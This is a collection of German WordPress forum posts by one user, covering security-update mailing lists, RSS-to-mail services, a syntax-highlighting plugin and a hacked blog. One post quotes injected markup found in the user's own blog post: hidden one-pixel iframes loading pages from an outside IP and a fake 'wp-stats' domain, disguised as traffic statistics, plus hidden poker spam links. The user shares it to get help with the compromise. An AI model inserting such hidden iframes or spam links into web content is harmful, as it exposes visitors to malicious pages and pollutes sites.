Beiträge von divB

    SusanneK: Ja, ich denke es war in nur einem Beitrag (sonst hab ichs nirgends gefunden)

    @Syntronica: Weil ich RSS hasse und nicht verwende. Aber kennt jemand einen Dienst im Internet der ein RSS --> Mail Gateway bietet? Also ich gib einfach das Feed an und jedesmal wenn auf dem Feed was neues erscheint bekomme ich ein Mail zugeschickt?

    lg,
    divB

    Danke für eure Antworten.

    Aber hat keiner eine Ahnung /was/ das für eine Lücke gewesen sein könnte, die es irgendjemand erlaubt, in Wordpress einfach ein fremdes Stück Code (und noch dazu einen iframe!) unterzubringen?

    Weiters möchte ich noch meine Frage wiederholen: Gibts keine Mailingslist (bei jeder Software ausser Wordpress handhabe ich das so) die mich über Updates informiert?

    Natürlich weiss ich dass der Ausweg ist immer die neuste Version zu verwenden. Aber wie erfahre ich davon? Mein Leben dreht sich nicht primär um Wordpress, deswegen kann und will ich nicht jeden Tag in den "Tellerrand" schaun oder nur deswegen irgendwelche RSS Feeds abonnieren.

    Jede Software die ich verwende und nicht unter der Kontrolle des Paketmanagements des Betriebssystems (apt, Debian, security.debian.org) steht beobachte ich über announce-Mailinglisten (horde, gallery2, phpbb, osCommerce, ...) GENAU DESWEGEN auf Sicherheitslücken. Gibts das echt nicht oder wieso schafft das Wordpress nicht?

    lg,
    divB

    Hi,

    Gab es vor kurzer Zeit eine Sicherheitslücke in Wordpress? Hab auf heise.de/security nix gefunden...

    Ich hab grad bemerkt dass in einem Beitrag von *mir* folgender Code drinnen war:

    Code
    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->
    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
    <noscript>Jeder der <a href="http://www.einepoker.de">online poker spielen</a> beim Poker zeigt seine Karten und dieser mit der hochsten Kartenkombination ist Sieger.</noscript>
    <noscript>Auch mus <a href="http://www.ibaelite.org/spiel-von-poker-online.html">pokerspiel</a> um Geld gespielt werden.</noscript>

    Ich hab den Dreck natürlich nicht reingegeben aber wie soll er sonst - wenn nicht durch eine Sicherheitslücke reingekommen sein?!

    Wie schütze ich mich davor?

    Und vor allem möchte ich diese alte Frage genau DESWEGEN wieder aufleben lassen: http://forum.wordpress-deutschland.org/installation/23619-sicherheit.html.

    Gibt es keine Mailinglist o.ä. die mich über Sicherheitslücken/updates informiert?!?! (RSS verwende ich nicht)

    lg,
    divB

    Früher oder später werd ich das sowieso in einen VServer stopfen, jedoch bisher finde ich eure Einstellung schon ein bisschen fahrlässig, muss ich sagen.

    Gerade solche "Front-End" Software bietet die größte Angriffsfläche und Sicherheitslücken existieren und werden gefunden. Was nutzt mir ein gut gewarteter Debian stable Server wenn auf einmal eine Sicherheitslücke in Wordpress auftritt und das System kompromittert wird?

    Zu unbekannten: Wie gesagt mit dem "bekannten" awstats hatte ich bereits einen quasi-Einbruch.

    H75: Ich verwende RSS eigentlich nicht (mag es auch nicht). Gibt es auch eine Möglichkeit dies per Mail zu erfahren (z.B. Announce-Mailinglist)?

    mfg,
    divB

    Hallo!

    Ich betreibe einen eigenen Server wo sowohl ich als auch einige andere Leute Wordpress installiert haben.
    Ich nehme Sicherheit sehr ernst; Ich verwende Debian stable und versuche möglichst Debian-Packages zu nehmen um möglichst schnell Sicherheitslücken schließen zu können.

    Aufgrund eines selbst installierten awstats weiss ich, was eine PHP Anwendung für eine Angriffsfläche bietet.

    Alle nicht Debian Anwendungen die in irgendeiner Weise von extern erreichbar sind habe ich mich auf eine announce-Mailingslist eingetragen um im Ernstfall möglichst schnell upgraden zu können.

    Bisher konnte ich sowas nicht finden für WordPress. Gibt es irgendeine Announce-Mailinglist (wenn möglich für die deutsche Version) die SOFORT berichtet, wenn eine Sicherheitslücke gefunden wurde??

    Gibt es andere Alternativen um den Server sicher zu halten?

    Danke für eure Vorschläge,
    divB

    Hi!

    Vielen Dank, das sieht wirklich vielversprechend nach dem aus was ich gesucht habe!

    Allerdings kann sein dass ich zu blöd bin :-(

    Ich hab die ZIP-Datei entpackt und in wp-admin/plugins kopiert. Als admin hab ich das Plugin dann in "Plugins" aktiviert.


    Aber irgendwie schaff ich es nicht dass er syntax highlighted.
    Ich habe den folgenden Testcode von der Homepage sowohl mit dem RichEdit-Editor, als auch mit dem "HTML"-Editor eingegeben, aber der Code erscheint immer nur als Text :-(

    [ source:php]
    // Re-insert source as (formatted) textarea
    foreach( $theSources[2] as $sourceID => $sourceBlock ) {
    $theBrush =
    $theSources[1][$sourceID].$optionString;
    $thePost = str_replace(
    ”{sourceID:{$sourceID}}”,
    sprintf( $textArea, $theBrush, $syntaxOptions[’syntaxCols’], $syntaxOptions[’syntaxRows’], $sourceBlock ),
    $thePost
    );
    }
    [/source]

    Hab ich was vergessen? Muss ich noch was aktivieren oder installieren? Im zip ist leider keine README...

    Hallo!

    Gibt es für WordPress nicht irgendeine Erweiterung/Editor/wie auch immer, mit dem es vernünftig möglich ist, Programmcode zu posten?

    Das eingebaute Teil kanns gar nicht und wenn ich den Code direkt in HTML schreibe, dann haut er einfach alle Umbrüche zusammen. Sowohl mit pre als auch mit code. Wenn ich die dann mühevoll selbst einfüge, entfernt er alle TABS und Leerzeichen am Anfang der Zeilen.

    Was GANZ wichtig ist: Ich möchte einfach per Cut'n'Paste Code einfügen können, dann eine Passage markieren und als Textblock setzen.

    Dabei soll berücksichtigt werden, dass der Code per Zwischenablage nun mal mit CRLF reinkommt.

    Also für jede Hints bin ich dankbar!


    Sonst hab ich keine Anforderungen, aber Code-Blog-Posts möchte ich so unkompliziert und schnell wie möglich machen können ;-)